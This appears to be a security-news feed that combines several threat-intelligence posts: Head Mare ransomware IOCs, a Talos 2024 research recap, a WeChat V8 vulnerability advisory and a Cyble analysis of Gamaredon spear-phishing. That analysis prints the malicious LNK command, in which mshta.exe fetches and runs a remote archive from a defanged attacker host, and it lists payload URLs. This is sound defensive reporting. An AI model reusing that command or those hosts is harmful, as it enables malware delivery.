Head Mare’s use of ransomware, including LockBit and Babuk, highlights their intent to cause maximum disruption. LockBit targets Windows systems, while Babuk is designed for ESXi servers. The encryption of files and the demand for ransoms serve both financial and operational purposes. By employing multiple ransomware variants and encrypting files twice, Head Mare increases the complexity of recovery and intensifies the pressure on victims to comply with their demands.

Conclusion

Head Mare’s cyber operations illustrate the evolving nature of cyber threats and their intersection with geopolitics. By targeting organizations in Russia and Belarus with sophisticated phishing and ransomware attacks, the group leverages its technical capabilities to influence political outcomes and create disruption.

Head Mare’s operations are a reflection of the broader geopolitical dynamics at play, with their cyber tactics serving as a means to exert political pressure and shape public perceptions. As the conflict between Russia and Ukraine continues to unfold, the role of cyber actors like Head Mare will likely remain an influential factor in international relations and security.

Recommendations and Mitigation

To counteract the threats posed by Head Mare and similar actors, organizations should implement the following best practices:

Continuously scan for vulnerabilities and apply patches promptly to mitigate the risk of exploitation.

Maintain encrypted backups in isolated locations to safeguard against ransomware attacks.

Use EDR solutions to detect and respond to malicious activities in real time.

Educate employees on recognizing and avoiding phishing attempts and other cyber threats.

Keep systems and software up to date with the latest security patches to reduce vulnerabilities.

Indicators of Compromise (IOCs)

Indicator
Type of Indicator
Comments

201F8DD57BCE6FD70A0E1242B07A17F489C5F873278475AF2EAF82A751C24FA8
SHA-256
NA

9F5B780C3BD739920716397547A8C0E152F51976229836E7442CF7F83ACFDC69
SHA-256
NA

08DC76D561BA2F707DA534C455495A13B52F65427636C771D445DE9B10293470
SHA-256
NA

6A889F52AF3D94E3F340AFE63615AF4176AB9B0B248490274B10F96BA4EDB263
SHA-256
NA

33786D781D9C492E17C56DC5FAE5350B94E9722830D697C3CBD74098EA891E5A
SHA-256
NA

5D924A9AB2774120C4D45A386272287997FD7E6708BE47FB93A4CAD271F32A03
SHA-256
NA

9B005340E716C6812A12396BCD4624B8CFB06835F88479FA6CFDE6861015C9E0
SHA-256
NA

5A3C5C165D0070304FE2D2A5371F5F6FDD1B5C964EA4F9D41A672382991499C9
SHA-256
NA

DC3E4A549E3B95614DEE580F73A63D75272D0FBA8CA1AD6E93D99E44B9F95CAA
SHA-256
NA

053BA35452EE2EA5DCA9DF9E337A3F307374462077A731E53E6CC62EB82517BD
SHA-256
NA

2F9B3C29ABD674ED8C3411268C35E96B4F5A30FABE1AE2E8765A82291DB8F921
SHA-256
NA

015A6855E016E07EE1525BFB6510050443AD5482039143F4986C0E2AB8638343
SHA-256
NA

9D056138CFB8FF80B0AA53F187D5A576705BD7954D36066EBBBF34A44326C546
SHA-256
NA

22898920DF011F48F81E27546FECE06A4D84BCE9CDE9F8099AA6A067513191F3
SHA-256
NA

2F1EE997A75F17303ACC1D5A796C26F939EB63871271F0AD9761CDBD592E7569
SHA-256
NA

AF5A650BF2B3A211C39DCDCAB5F6A5E0F3AF72E25252E6C0A66595F4B4377F0F
SHA-256
NA

9E9FABBA5790D4843D2E5B027BA7AF148B9F6E7FCDE3FB6BDDC661DBA9CCB836
SHA-256
NA

B8447EF3F429DAE0AC69C38C18E8BDBFD82170E396200579B6B0EFF4C8B9A984
SHA-256
NA

92804FAAAB2175DC501D73E814663058C78C0A042675A8937266357BCFB96C50
SHA-256
NA

664B68F2D9F553CC1ACFB370BCFA2CCF5DE78A11697365CF8646704646E89A38
SHA-256
NA

311EDF744C2E90D7BFC550C893478F43D1D7977694D5DCECF219795F3EB99B86
SHA-256
NA

4C218953296131D0A8E67D70AEEA8FA5AE04FD52F43F8F917145F2EE19F30271
SHA-256
NA

2D3DB0FF10EDD28EE75B7CF39FCF42E9DD51A6867EB5962E8DC1A51D6A5BAC50
SHA-256
NA

DC47D49D63737D12D92FBC74907CD3277739C6C4F00AAA7C7EB561E7342ED65E
SHA-256
NA

EDA18761F3F6822C13CD7BEAE5AF2ED77A9B4F1DC7A71DF6AB715E7949B8C78B
SHA-256
NA

188.127.237[.]46
IP
NA

45.87.246[.]169
IP
NA

45.87.245[.]30
IP
NA

185.80.91[.]107
IP
NA

188.127.227[.]201
IP
NA

5.252.176[.]47
IP
NA

45.11.27[.]232
IP
NA

188.127.237[.]46/winlog.exe
URL
NA

188.127.237[.]46/servicedll.exe
URL
NA

194.87.210[.]134/gringo/splhost.exe
URL
NA

194.87.210[.]134/gringo/srvhost.exe
URL
NA

94.131.113[.]79/splhost.exe
URL
NA

94.131.113[.]79/resolver.exe
URL
NA

45.156.21[.]178/dlldriver.exe
URL
NA

5.252.176[.]77/ngrok.exe
URL
NA

5.252.176[.]77/sherlock.ps1
URL
NA

5.252.176[.]77/sysm.elf
URL
NA

5.252.176[.]77/servicedll.rar
URL
NA

5.252.176[.]77/reverse.exe
URL
NA

5.252.176[.]77/soft_knitting.exe
URL
NA

5.252.176[.]77/legislative_cousin.exe
URL
NA

5.252.176[.]77/2000×2000.php
URL
NA

Sources:

https://jamestown.org/program/developments-on-belarus-ukraine-border-prompt-roller-coaster-of-reactions-in-minsk/

https://kyivindependent.com/belarus-moved-third-of-its-army-to-ukraine-border-due-to-independence-day-celebration-mixup-lukashenko-claims/

https://www.atlanticcouncil.org/blogs/ukrainealert/putin-hopes-belarus-border-bluff-can-disrupt-ukraines-invasion-of-russia/

https://www.aljazeera.com/news/2024/8/18/belarus-says-ukraine-amassing-troops-at-border-amid-incursion-into-russia

The post The Rise of Head Mare: A Geopolitical and Cybersecurity Analysis appeared first on Cyble.

Blog – Cyble – Read More

The 2024 Threat Landscape State of Play

September 8, 2024/in Company Blogs

As we head into the final furlong of 2024, we caught up with Talos’ Head of Outreach Nick Biasini to ask him what sort of year it’s been so far in the threat landscape.

In this video, Nick outlines his two major areas of concern. He also focusses on one state-sponsored actor that has been particularly active this year (Clue: It rhymes with “Bolt Teaspoon”), and we talk about why the infostealer market has gone through a maturing phase, and why that’s an issue for defenders.

After you’ve watched the video, I’ve highlighted some of our threat spotlight blogs from the year so far below, which may be worth a revisit.

2024 in threat research:

Jan. 18: Exploring malicious Windows drivers

Drivers have long been of interest to threat actors, whether they are exploiting vulnerable drivers or creating malicious ones. Malicious drivers are difficult to detect and successfully leveraging one can give an attacker full access to a system. Part 1 of our Driver series served as a starting point for learning about malicious drivers while part 2, released in June, covered the I/O system, IRPs, stack locations, IOCTLs and more.

Feb. 8: New Zardoor backdoor used in long-term cyber espionage operation targeting an Islamic organization

Talos discovered a new, stealthy espionage campaign that likely persisted since at least March 2021. The observed activity affects an Islamic non-profit organization using backdoors for a previously unreported malware family we have named “Zardoor.”

Feb. 15: TinyTurla Next Generation — Turla APT spies on Polish NGOs

This backdoor we called “TinyTurla-NG” (TTNG) was similar to Turla’s previously disclosed implant, TinyTurla, in coding style and functionality implementation.

Feb. 20: Astaroth, Mekotio & Ousaban abusing Google Cloud Run in LATAM-focused malware campaigns

Since September 2023, we observed a significant increase in the volume of malicious emails leveraging the Google Cloud Run service to infect potential victims with banking trojans.

Feb. 27: TimbreStealer campaign targets Mexican users with financial lures

Talos observed a phishing spam campaign targeting victims in Mexico, luring users to download a new obfuscated information stealer we’re calling TimbreStealer, which has been active since at least November 2023.

March 5: GhostSec’s joint ransomware operation and evolution of their arsenal

We observed a surge in GhostSec’s malicious activities this past year. GhostSec evolved with a new GhostLocker 2.0 ransomware, a Golang variant of the GhostLocker ransomware.

April 9: Starry Addax targets human rights defenders in North Africa with new malware

We disclosed a new threat actor we deemed “Starry Addax” targeting mostly human rights activists, associated with the Sahrawi Arab Democratic Republic (SADR) cause with a novel mobile malware.

April 16: Large-scale brute-force activity targeting VPNs, SSH services with commonly used login credentials

Talos actively monitored a global increase in brute-force attacks against a variety of targets, including Virtual Private Network (VPN) services, web application authentication interfaces and SSH services since at least March 18, 2024.

April 17: OfflRouter virus causes Ukrainian users to upload confidential documents to VirusTotal

During a threat-hunting exercise, Talos discovered documents with potentially confidential information originating from Ukraine. The documents contained malicious VBA code, indicating they may be used as lures to infect organizations.

April 23: Suspected CoralRaider continues to expand victimology using three information stealers

Talos discovered a new PowerShell command-line argument embedded in the LNK file to bypass anti-virus products and download the final payload into the victims’ host.

April 24: ArcaneDoor — New espionage-focused campaign found targeting perimeter network devices

ArcaneDoor was a campaign that was the latest example of state-sponsored actors targeting perimeter network devices from multiple vendors. Coveted by these actors, perimeter network devices are the perfect intrusion point for espionage-focused campaigns.

May 22: From trust to trickery: Brand impersonation over the email attack vector

Cisco developed and released a new feature to detect brand impersonation in emails when adversaries pretend to be a legitimate corporation.

May 31: New banking trojan “CarnavalHeist” targets Brazil with overlay attacks

Since February 2024, Cisco Talos observed an active campaign targeting Brazilian users with a new banking trojan called “CarnavalHeist.” Many of the observed tactics, techniques and procedures (TTPs) were common among other banking trojans coming out of Brazil.

June 5: DarkGate switches up its tactics with new payload, email templates

DarkGate was observed distributing malware through Microsoft Teams and even via malvertising campaigns.

Aug. 1: APT41 likely compromised Taiwanese government-affiliated research institute with ShadowPad and Cobalt Strike

ShadowPad, widely considered the successor of PlugX, is a modular remote access trojan (RAT) only seen sold to Chinese hacking groups.

Aug. 28: BlackByte blends tried-and-true tradecraft with newly disclosed vulnerabilities to support ongoing attacks

In recent investigations, Talos Incident Response observed the BlackByte ransomware group using techniques that depart from their established tradecraft.

You can always bookmark the Threat Source newsletter to keep up to date with all things Talos threat research.

Cisco Talos Blog – Read More

Vulnerability in Tencent WeChat custom browser could lead to remote code execution

September 8, 2024/in Company Blogs

Certain versions of WeChat, a popular messaging app created by tech giant Tencent, contain a type confusion vulnerability that could allow an adversary to execute remote code. While this issue, CVE-2023-3420, was disclosed and patched in the V8 engine in June 2023, the WeChat Webview component was not updated, and still remained vulnerable when Talos reported to the vendor in April 2024. Cisco Talos researchers have confirmed that WeChat versions up to 8.0.42 (the latest version on the Google Play store for Android devices before June 14, 2024) were vulnerable to this issue. However, due to the dynamic WebView loading mechanism, Talos cannot confirm if it’s patched on all versions. Talos reported the vulnerability to Tencent WeChat on April 30, 2024, and continued our investigation in the following weeks and months.

Vulnerability overview

WeChat is an instant messenger application with a large user base in China. It also offers users the ability to pay for certain products through the app and includes several functionalities similar to other social media platforms like Facebook and X.

During Cisco Talos’ research of WeChat, we uncovered that it employs a custom WebView component instead of relying on the built-in Android WebView. This component is a custom version of XWalk, maintained by Tencent, which consists of an embedded Chromium browser with V8 version 8.6.365.13 released on Oct. 12, 2020, supporting the rendering of HTML and the execution of JavaScript.

The custom WebView component is dynamically downloaded onto the phone after the user logs into the app for the first time, allowing Tencent to deploy dynamic updates. When downloaded, XWalk webview is located at the path `/data/data/com.tencent.mm/app_xwalk_4433/apk/base.apk`. The library at /data/data/com.tencent.mm/app_xwalk_4433/extracted_xwalkcore/libxwebcore.so contains an embedded browser environment with an outdated version of V8.

GitHub Security Labs published detailed analysis of this vulnerability, CVE-2023-3420, for V8 version 11.4.183.19 in June 2023.

How can the exploit be triggered?

The exploit, which we have seen in the wild, is triggered when the victim clicks a URL in a malicious WeChat message. Clicking a URL in WeChat causes the webpage with embedded JavaScript to be loaded inside XWalk, which triggers exploitation. A so called one-click exploit.

What is the impact of this vulnerability?

The exploit allows the threat actor to gain control of the victim’s device and execute arbitrary code.

CVSSv3 Score: 8.8 – CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

How do I know if I’m impacted?

Talos has confirmed the WeChat version 8.0.42 (the latest version available on the Play Store before June 14) is impacted. For WeChat using the impacted custom browser (MMWEBID/2247), the user agent of request includes the version information of the custom browser. For example:

Mozilla/5.0 (Linux; Android 14; Pixel 6 Build/UQ1A.240105.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/86.0.4240.99 XWEB/4433 MMWEBSDK/20230805 Mobile Safari/537.36 MMWEBID/2247 MicroMessenger/8.0.42.2428(0x28002A48) WeChat/arm64 Weixin GPVersion/1 NetType/4G Language/en ABI/arm64

What do I do if I’m impacted?

Update to the latest version of WeChat and confirm XWalk is updated as well (in our testing, the app does not get updated to the latest version automatically right after the update is released). Alternatively, do not click on any links sent over WeChat if using the impacted versions. If you must read links, copy the link from the WeChat chat and open them on an updated web browser outside the application. We recommend WeChat users be aware of the URL links sent in WeChat. Before clicking the URL links, verify it’s from a trusted source.

Bug report Timeline

April 30, 2024: Disclosed to vendor while research was ongoing. May 31, 2024: Tencent acknowledges report and confirms they know about the vulnerability and are working on patching it. June 14, 2024: New version of WeChat 8.0.48 released on Play Store. However, the app on our testing device did not get automatically updated. June 27, 2024: Notified Vendor of our intention to publish.

Credit

Chi En Shen (Ashley Shen), Vitor Ventura, Michael Gentile and Aleksandar Nikolic of Cisco Talos.

Cisco Talos Blog – Read More

Spear-Phishing in the Battlefield: Gamaredon’s Ongoing Assault on Ukraine’s Military

September 8, 2024/in Company Blogs

Key Takeaways

Cyble Research and Intelligence Labs (CRIL) identified an active Gamaredon campaign targeting Ukrainian military personnel through spear-phishing emails.

The emails include malicious XHTML attachments, which, when opened, execute obfuscated JavaScript code that downloads a malicious archive to the victim’s system.

This archive contains a Windows shortcut (LNK) file that, when triggered, initiates the execution of a remote .tar archive hosted on TryCloudflare[.]com via mshta.exe.

The Threat Actors (TAs) leverage TryCloudflare’s one-time tunnel feature to anonymously host malicious files and access resources remotely without detection.

The campaign appears to be large-scale and coordinated, as indicated by the widespread distribution of similar files, and it remains ongoing based on the volume and timing of discovered samples.

The inclusion of a 1-pixel remote image suggests the TAs are tracking victim interactions with the malicious files, likely to monitor the campaign’s effectiveness.

Executive Summary

As the Russia-Ukraine conflict continues to evolve, we remain vigilant in monitoring emerging threats. Previously, we tracked the activities of UNC1151, which targeted Ukraine’s Ministry of Defence with a malicious Excel document designed to compromise sensitive systems. Additionally, we observed UAC-0184’s malware campaign, which deployed the XWORM RAT against Ukrainian targets, utilizing Python to facilitate DLL sideloading techniques for further infiltration.

During our investigation, we came across an ongoing campaign of Gamaredon targeting Ukraine. Gamaredon, also known as Primitive Bear or Armageddon, is a Russian-linked Advanced Persistent Threat (APT) group that has been active since at least 2013. It is known for its cyber-espionage activities, primarily targeting Ukrainian government institutions, military, and other critical infrastructure sectors.

Gamaredon has been involved in numerous high-profile campaigns, particularly during periods of heightened tension between Russia and Ukraine. Although its operations have been characterized by the use of relatively low-sophistication tools, its success is attributed to its persistence and focus on specific geopolitical targets.

In recent months, Gamaredon has intensified its efforts with a large-scale phishing campaign aimed at Ukrainian entities. This campaign involves sophisticated tactics and widespread phishing attempts, reflecting the ongoing and escalating nature of cyber threats amidst the conflict. The figure below shows the Gamaredon sample observed since the start of August 2024.

Amid the ongoing Russia-Ukraine conflict, Cyble Research and Intelligence Labs (CRIL) encountered a spear-phishing campaign targeting Ukrainian military personnel. The malicious email contains an XHTML attachment that, upon opening, executes several malicious activities on the infected system. After thorough analysis, our research points to the Gamaredon APT group as the orchestrator of this attack.

Technical Details

The campaign begins with a spear-phishing email bearing the subject “ПОВІСТКА,” which translates to “summons.” The email is themed around a military summons directed at the recipient and includes a malicious XHTML attachment, as shown in the figure below.

Upon opening the XHTML file, the user is presented with a message in Ukrainian stating, “File uploaded to the ‘DOWNLOADS’ folder.” Simultaneously, a RAR compressed folder is silently dropped into the system’s Downloads directory. This action is designed to mislead the victim, making it appear as though a legitimate file has been downloaded. The figure below shows the XHTML message.

The XHTML file contains obfuscated JavaScript code that executes upon the user opening the file. In the XHTML, the JavaScript is embedded within a `div` element, with the `div id` set to “jwu.” This obfuscated script consists of a Base64-encoded string mixed with a “*” character at random places to evade detection. The JavaScript execution is triggered via the “onerror” event. In some variants, it is activated through the “onmousemove” event, ensuring the malicious code runs as soon as the user interacts with the file. The figure below shows the obfuscated XHTML code.

The de-obfuscated string within the “jwu” `div` reveals JavaScript code that contains a Base64-encoded 7zip compressed archive disguised with a .rar file extension. This script decodes the Base64 data and saves the 7zip archive to the Downloads folder as “5-2839-2024_29.08.2024.rar.” Additionally, the script retrieves a 1-pixel remote image, likely serving as a tracking mechanism to monitor the execution and interaction with the malicious file. The figure below shows the de-obfuscated JavaScript.

The RAR file contains a Windows shortcut (LNK) file. Upon execution, the malicious LNK file triggers the execution of the remote .tar file via mshta.exe. In this campaign, the TAs leveraged the domain trycloudflare[.]com to host the malicious tar archives. By exploiting the TryCloudflare service, TAs can establish a one-time tunnel without the need for an account with Cloudflare. This tunnel enables remote access to resources and data outside the local network, functioning similarly to a VPN or secure shell (SSH) protocol, allowing the attackers to evade traditional detection mechanisms.

The Target command of the LNK file is mentioned below.

“C:WindowsSystem32mshta.exe hxxps://jurisdiction-xhtml-peace-surrey[.]trycloudflare.com/tcg/instruct/instructor.tar /f”

The figure below shows the property of the LNK file.

We were unable to obtain the .tar files in our research. However, according to an analysis by Cisco Talos, Gamaredon is known for downloading additional malicious files designed to steal sensitive information from the victim’s system.

Conclusion

The ongoing Gamaredon APT campaign demonstrates the group’s persistence and evolving tactics in targeting Ukrainian military personnel. By leveraging spear-phishing emails, malicious XHTML attachments, and obfuscated JavaScript, the attackers deliver harmful payloads while exploiting TryCloudflare’s one-time tunnel feature to host malicious archives. The campaign’s scale and frequency indicate a coordinated, mass phishing effort aimed at sensitive Ukrainian entities.

Recommendations

The following are the recommendations to Mitigate the Gamaredon APT Campaign.

Train users to recognize spear-phishing attempts, especially those with suspicious attachments or unexpected military-themed content.

Implement email security solutions with advanced threat protection, filtering phishing emails and malicious attachments.

Deploy anti-malware solutions capable of detecting and blocking obfuscated JavaScript and malicious LNK files.

Monitor for unusual network activity, including connections to TryCloudflare tunnels and other unknown external resources.

Use application whitelisting to allow only trusted applications and scripts to run.

Leverage threat intelligence platforms to block known malicious domains, including those abusing TryCloudflare.

MITRE ATT&CK® Techniques

Tactic
Technique
Procedure

Initial Access (TA0001)
Phishing: Spearphishing Attachment (T1566.001 )
Gamaredon sends spear-phishing emails with malicious XHTML attachments targeting Ukrainian military personnel.

Execution (TA0002)
User Execution: Malicious File (T1204.002)
The campaign relies on users opening the XHTML attachment, which then triggers JavaScript code execution.

Execution (TA0002)
Signed Binary Proxy Execution: Mshta (T1053.005)
mshta.exe is used to execute a remote .tar archive file hosted on a compromised cloud service.

Defence Evasion (TA0005)
Obfuscated Files or Information (T1027)
The campaign uses obfuscated JavaScript hidden in the XHTML file, including random “*” characters in Base64 encoded strings to avoid detection.

Indicators Of Compromise

Indicator
Indicator Type
Description

0c823adb18cf2583222e6fbe73c08cac8147d20b02fbe88d51cac2a1c628a30b
SHA256
XHTML

12bac5853724722330ce7f6b782db13844f8343ccc851fa2db1e93b980a6cf49
SHA256
XHTML

a4806713db9cf41ab503e046981b8c5e1a9928314bb32545bd104fab2c36b332
SHA256
XHTML

0fd6e081172d8576ad2f16ab6360a0086442560aa24ab1f4636a592f279c19ef
SHA256
XHTML

66de05ae4f4f185a514ad11daac0b7f944748ffa6885a7d7a826def45d305cfe
SHA256
XHTML

1a6ce74fc1487537936d769243f39b265fd3911e72e7caacaa793f1fffe52296
SHA256
XHTML

e6d342fde640e5d5d9ef2f470d0f23ed660d7f19cc33470ec40a9f8e9b9c1561
SHA256
XHTML

17f66f2b3e2f9ba8c8f739876f99e2d7abc81b264f3015d3de86267f007cc49b
SHA256
XHTML

10cecb7a032325024b9ba7a0ea5f1a910268078317ca4ca7dae9e06779837631
SHA256
XHTML

83d4b0aea975acb7f80417748f179d8ef9ecbba9150b24e3354ef92e17ccf242
SHA256
XHTML

201ad0967246bb0a5b3f7aa85f31395e750c0237959d86b9c2d9dbf5fbb951c4
SHA256
XHTML

d4df2899a4569f7cb9ac5edce6b4eef8eba3031b7f96f74552734362afea18b7
SHA256
XHTML

95beb4bd1a94c8db58dddeb926f656003e1dca2c66d04870380445b23840b536
SHA256
XHTML

13f065a592246074d7d929dd4f977d247a69efa9e1dbbe3613f81d3d8f39d6f4
SHA256
XHTML

a1d689a0839a143e371242fb217db82e0cbdfeff4daa49e6ffe5c5b3375fae3d
SHA256
XHTML

4b1d8e58c866a8b12e8987559287592ee54a482328e8c03d5666a761bcf10f92
SHA256
XHTML

db63ca233296a239e4b8d7f28b2db776596bcb645d3958bc4b3447074d7635b9
SHA256
XHTML

2da9941aae860aaa2d3bb7208c900549464955733457f529014d945a24737e79
SHA256
XHTML

2636907826c9bc27ee4c7519979c0add5ad981e71edf7eb53002b8ab89fc8142
SHA256
XHTML

e18955f5a9fb6abb30fd5dcbc840d34cce9bb1c70552cc36941139fc6e7304b5
SHA256
XHTML

0ae813d5ea1c0114795174a48b57a90c0f719485e3c733bbd5403c77dab29298
SHA256
XHTML

71e02cfc2c871768b8ae5ad9af9e9cb664e0a66be3f3c8d050b6d58f3cd4c07a
SHA256
XHTML

ad2c0c8d14d782610ed7173a5d0b4bd13524ceb1027d070a1cda312cfd60983a
SHA256
XHTML

1cbd7696840ec6a3442a8bf4f7deb545bbeeee68fb27e4352197953af976cf2a
SHA256
XHTML

0a4bcecdee823cc3c2d4ae2d5569edca7bc8372f5d37f62083782e92732a63c8
SHA256
XHTML

afa7a8bb0cb0508f579b936488bbfff0142d458c26ef98904cb06e98f6b50f81
SHA256
XHTML

265042be55ec0082a500a24cdb5da8b289c42116e23eddcfc80dfd24019f6412
SHA256
XHTML

1b3db58482ad147faeda64eced7648bee08bfc78194e3f7bcb52cf1860d07a04
SHA256
XHTML

821ee2a91cca1e17f890e099ee41a47cc5943149a10e81467e57803d6d5b02de
SHA256
XHTML

0e1eb8a5f850bc7712f78adcfe6c7c29215ea620ad2c36a0795016f0299d6ea4
SHA256
XHTML

f9662c14db97db311d71b00ce33a41bbc4bc4ab6f05d8ccd99562e773d8948b1
SHA256
XHTML

c7802521935c6dc3dc81e15ac952b9782ca1743dcd9e4e11030f0957d8f2a156
SHA256
XHTML

56188e68f6f6bba34f6771056859f1a7232edef264fbe67e0c8b30c1ca569259
SHA256
XHTML

a620f9af481001e2d96a2d210f086fa144731a1b95db32addcd148e09a627374
SHA256
XHTML

df124b73f309e634ca7c226c5e1ae2545f45907a88a40249c8ac1d5e40eca43f
SHA256
XHTML

f94817a02884f73f9ed462c67581cda4fc169568f7636f01237a25da3df93d7c
SHA256
XHTML

5f7173cd548b227206e70419739a2f6ca4087ef693297b9b67a29fbcb4d1e928
SHA256
XHTML

f59715593679ff13e92e14f8f98c6ead1cbe678f3a5ac28de8085c1a7132b02c
SHA256
XHTML

58d6c125ccab32414f63ba62cc7ba4a2500a0d2890506069ba7e0ac166799491
SHA256
XHTML

51427e20fc02cb04948c2ab53378beb52727a6a84570f880aeaebd6be27f1dad
SHA256
XHTML

bbc97c086436385c32b0ac5f6cf35e7446f0e12e0412ed090e7099b873837795
SHA256
XHTML

a7d060ea2dfd98f723aff909e5c88c3d8d3d54d96e5f6e7a09aad1de8d8ef10b
SHA256
XHTML

cba52f16695dc3d80a98c560a7614a3f91aaea242344b423b260d06362a2c9e0
SHA256
XHTML

ab333d21c0fa8fe5b6cd620736fb04d7af53a6a0be604066617a1374fa7baa78
SHA256
XHTML

a4b912413e39b4307613c8941af258750782e77d820c172155dfaaee6b32d2db
SHA256
XHTML

c863155cf6a39a376eef232737ba2922e324d8b05de36ddebe4068060b09a498
SHA256
XHTML

bee43c5f1a714fdef911e5dc99fe27854f5db00de859dddc09e720eb56e1c53e
SHA256
XHTML

ca7a5daf2528233dae5c38d929a07ef30d5ca7d349df2ce842d795311f22fa2f
SHA256
XHTML

770223d8c0c7d5abd4d6c0215cf9479f7a0e32a1dfaaa3b42c71dfe26ccb986f
SHA256
XHTML

dacb0c04579116f6245ca0ee69a5d328c3f23e5d0c5f579133070fe0f06659d1
SHA256
XHTML

0a06f536d08150ce6ea521a563fd321229b9e044ce993f9a667336a34d838b3f
SHA256
XHTML

57dd02447cf705fe570ed6b3051f3bff06e8506360ba667e02731332d04eb37c
SHA256
XHTML

0e0ce820f8b5deae3755ed372a0b898861a4cc7cb70cfd90197452773b078452
SHA256
XHTML

dbdff73a7a6e6eae23c8cd5093b3df11f39cddf86e48b651e68c329df59ee0e8
SHA256
XHTML

c32f28fc87f8efcd3f9c044f1898f3e712d4b4802c99df1525644ebfb3df2f2d
SHA256
XHTML

e867ce12e119eebe53de1acccd99fca09a9802d1432d31dafaf5d76b8a87f099
SHA256
XHTML

92ee588be70e23ca459627ae22f05fba11589eeaeed0f8dd153416d952bb57e0
SHA256
XHTML

1ab3b99af98b7d9fb13d5b6acfc1bf3f4aa2a751bea58ba060f386509ccc73d3
SHA256
XHTML

b8f91aae00889eda914ef72b99688e920e113fb3723607250d2a1c949effaac3
SHA256
XHTML

b95eea2bee2113b7b5c7af2acf6c6cbde05829fab79ba86694603d4c1f33fdda
SHA256
XHTML

7525cd06447204ce72e5d24eb1e96c142d72f9f8f5339d61b6151f430bda2dae
SHA256
XHTML

be801d78c112fae7a1cec1d20e1f2a85f28987d15c825c1773860bc7e99c5e87
SHA256
XHTML

de2f0a2aafacfee9d7989cdafd0617211a44d320b0fba6c488f480d92dab0891
SHA256
XHTML

66d30cc00a2445c5527049875e43c2c85a8995a0983502cd5e0276235bab8040
SHA256
XHTML

450badddfae09a3eedb613e59f9a18d69632ee28d5e59e52c6d4bae151225f87
SHA256
XHTML

d55a4a4596908abc5742f43e9b44b23951935feead10de52f3916ac5fd811a80
SHA256
XHTML

7cdf0df1284b75a7d4e945d1d6a707c65e3527ae38aea7c9d82163c019c8203c
SHA256
XHTML

37c7adb7a719ec99c54b86faad0a2e5164599f0b85ecbc07683b89da0355c655
SHA256
XHTML

efceb2cb0d0a332a630c04a8bce6f0e5dedd297ce7c0943f3783ee0749342ef3
SHA256
XHTML

ce040948011f0ccc9309ab2cb08c7a80bf0337415818cf916e6e2e7ed70ed49e
SHA256
XHTML

5938c03b725f37f68ebf950edf4fd5688900e273ee0a55c305ff4fd9995d03b1
SHA256
XHTML

112bd0f71522e05c21ad249a20534fb8d3306a73f5c39dd44bfb9e198a96e9f8
SHA256
XHTML

cbfe9331e8a1b36f8e5be68f6588a6a116dfd63b474fcac618bc75854535e699
SHA256
XHTML

c449c4be65021a4563da97ae4f150bed4f388236031d33e17953b7d6666381e1
SHA256
XHTML

6c1e4a444e40b27db722be2321eb1c69455251940b30f0e2232103015b7af3cc
SHA256
XHTML

11b0f2bbb811f42dd463c247401fddd9c2efb2708b9be142573597ee869da29a
SHA256
XHTML

7c2bbaaa90b7f66b9ccfb3136905e8d07d8c8f1542aa605844319992a39133c9
SHA256
XHTML

982dac7a43329d6e204e74d87d60c08e94ba3a46ccf36445b218b86f05e44a90
SHA256
XHTML

5a70f39a3d87469146b0a8a92086675dc15e483aa412a0a9aa5dc9809bf8f22f
SHA256
XHTML

663c6f08b3aedb4323e0f73cab526ddcc1f6de53ea7084712940c1cb54d75ab0
SHA256
XHTML

hxxps://newbie-housewives-poxxer-trailers[.]trycloudflare[.]com/zgur/preservation/selected[.]rar
URL
Malicious URL

hxxps://newbie-housewives-poxxer-trailers[.]trycloudflare[.]com/zgur/seeing/prayers[.]rar
URL
Malicious URL

hxxps://amsterdam-sheet-veteran-aka[.]trycloudflare[.]com/regular/presence[.]tar
URL
Malicious URL

hxxps://amsterdam-sheet-veteran-aka[.]trycloudflare[.]com/preceding/baron[.]tar
URL
Malicious URL

hxxps://tracked–radar-ni[.]trycloudflare[.]com/zgur/sensation/headstone[.]rar
URL
Malicious URL

hxxps://cod-identification-imported-carl[.]trycloudflare[.]com/f/precaution[.]rtf
URL
Malicious URL

hxxps://strange-hunger-appeared-res[.]trycloudflare[.]com/uss/senior/refuge[.]tar
URL
Malicious URL

hxxps://strange-hunger-appeared-res[.]trycloudflare[.]com/gss/quest/presents[.]tar
URL
Malicious URL

hxxps://nobody-principal-long-un[.]trycloudflare[.]com/pov/decide/barn[.]tar
URL
Malicious URL

hxxps://molecular-throw-process-dealtime[.]trycloudflare[.]com/gss/quietly/seller[.]tar
URL
Malicious URL

hxxps://tracked–radar-ni[.]trycloudflare[.]com/zgur/questions/preponderant[.]rar
URL
Malicious URL

hxxps://tracked–radar-ni[.]trycloudflare[.]com/psvr/decay/barefooted[.]rar
URL
Malicious URL

hxxps://newbie-housewives-poxxer-trailers[.]trycloudflare[.]com/psvr/rejoined/net[.]rar
URL
Malicious URL

hxxps://sunrise-massive-joseph-commodities[.]trycloudflare[.]com/zsvr/sentiment/banisters[.]rar
URL
Malicious URL

hxxps://wp-acm-configuration-fm[.]trycloudflare[.]com/uss/growth/days[.]tar
URL
Malicious URL

hxxps://nobody-principal-long-un[.]trycloudflare[.]com/pov/intake/bargain[.]tar
URL
Malicious URL

hxxps://strange-hunger-appeared-res[.]trycloudflare[.]com/uss/bargain/barton[.]tar
URL
Malicious URL

hxxps://jurisdiction-xhtml-peace-surrey[.]trycloudflare[.]com/tcul/based/guarded[.]tar
URL
Malicious URL

hxxps://tracked–radar-ni[.]trycloudflare[.]com/sudu/insufficient/neutral[.]rar
URL
Malicious URL

hxxps://tracked–radar-ni[.]trycloudflare[.]com/sudu/decide/quest[.]rar
URL
Malicious URL

hxxps://australian-prepared-derek-hands[.]trycloudflare[.]com/vo/nervous/bar[.]tar
URL
Malicious URL

hxxps://bush-worcester-houses-statements[.]trycloudflare[.]com/sudu/headlong/headache[.]rar
URL
Malicious URL

hxxps://expertise-sir-designs-columbus[.]trycloudflare[.]com/tu/lost/net[.]tar
URL
Malicious URL

hxxps://australian-prepared-derek-hands[.]trycloudflare[.]com/vomr/regards/bananas[.]tar
URL
Malicious URL

hxxps://australian-prepared-derek-hands[.]trycloudflare[.]com/vg/relax/quickly[.]tar
URL
Malicious URL

hxxps://nobody-principal-long-un[.]trycloudflare[.]com/pov/preparations/sequel[.]tar
URL
Malicious URL

hxxps://charter-blond-desired-promptly[.]trycloudflare[.]com/gmm/base/guarantee[.]tar
URL
Malicious URL

hxxps://wp-acm-configuration-fm[.]trycloudflare[.]com/uss/heap/September[.]tar
URL
Malicious URL

